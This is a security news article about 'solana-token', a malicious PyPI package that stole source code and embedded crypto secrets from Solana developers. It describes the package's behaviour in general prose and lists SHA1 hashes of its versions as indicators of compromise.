Security Alert: Malicious Python Package Targeting Solana Developers
Security experts at RL have uncovered a harmful Python package named “solana-token” on the PyPI repository. This malicious package was designed to exploit developers working on the Solana blockchain, highlighting the persistent risks within the open-source software landscape.
Pretending to be a tool for blockchain application development, this package was downloaded over 600 times before it was identified and removed. The incident illustrates the increasing sophistication of software supply chain attacks targeting the cryptocurrency community.
This discovery serves as a stark reminder to developers to remain vigilant when using third-party libraries, as attackers are increasingly using seemingly legitimate tools to steal sensitive data and compromise secure environments.
Sample of solana-token source code showing data exfiltration.
Deceptive Tool with Hidden Dangers
The solana-token package disguised itself as a helpful tool for Solana, a high-speed, low-cost blockchain platform established in 2017 by Solana Labs and overseen by the Solana Foundation. However, hidden within its code were features designed to cause harm.
RL’s analysis revealed that the package had several characteristics typical of malicious software. These included hardcoded URLs using IP addresses to hide communication with command-and-control servers, connections to non-standard ports, and file-reading behaviors typical of infostealer malware.
Alarmingly, a particular method within the package was crafted to scan the Python execution stack, extract source code from files within the execution chain, and send this data to a remote server. The main target seems to be the theft of hardcoded cryptographic secrets—such as private keys or access credentials to cryptocurrency wallets—embedded within developers’ codebases. Such an attack could lead to severe security breaches.
Interestingly, this is not the first time a package named solana-token has been flagged as malicious. A year ago, a similarly named package with different version numbers (1.0.1 and 1.0.2 compared to the latest 0.0.1 and 0.0.2) was detected and voluntarily removed by its authors, not by PyPI security administrators, leaving the name available for reuse.
Although RL lacks concrete evidence linking the same threat actors to both campaigns, the recurrence of the package name raises suspicions. After RL’s report, PyPI administrators have now removed the latest iteration, hopefully preventing further uploads under this name.
This incident echoes earlier campaigns, such as “BIPClip” in 2024, where seven PyPI packages aimed at BIP39 mnemonic phrases for crypto wallet recovery were downloaded nearly 7,500 times, demonstrating a persistent trend of targeting crypto developers.
Rising Threats in the Crypto Supply Chain
The discovery of solana-token emphasizes the growing risk of supply chain attacks within the cryptocurrency sector. Unlike recent exploits targeting end-user applications like Atomic and Exodus wallets, this package specifically targets developers, aiming to harvest application code and embedded secrets as a precursor to broader attacks.
These tactics exploit the trust developers have in open-source repositories, transforming tools meant to streamline innovation into avenues for compromise. RL advises development teams to enhance monitoring for suspicious behaviors—such as unexpected network activity or unauthorized file access—in both open-source and commercial third-party modules.
By detecting malicious code before it infiltrates secure environments, organizations can block destructive attacks and protect critical infrastructure.
Indicators of Compromise (IOCs)
| Package Name | Version | SHA1 |
|---|---|---|
| solana-token | 0.0.1 | f4e1149360174b4fcf0dcc6e61898c8180324893 |
| solana-token | 0.0.1 | 0b8697f8e81956e7c0c5383806fa69630c38ad33 |
| solana-token | 0.0.2 | e07457e36bf9aab1dc2b54acd30ec8f9e5c60c84 |
| solana-token | 0.0.2 | 9719d1e076ab67a18f231889cad4b451f539ce72 |
Find this News Interesting! Follow us on Google News, LinkedIn, & X to Get Instant Updates!
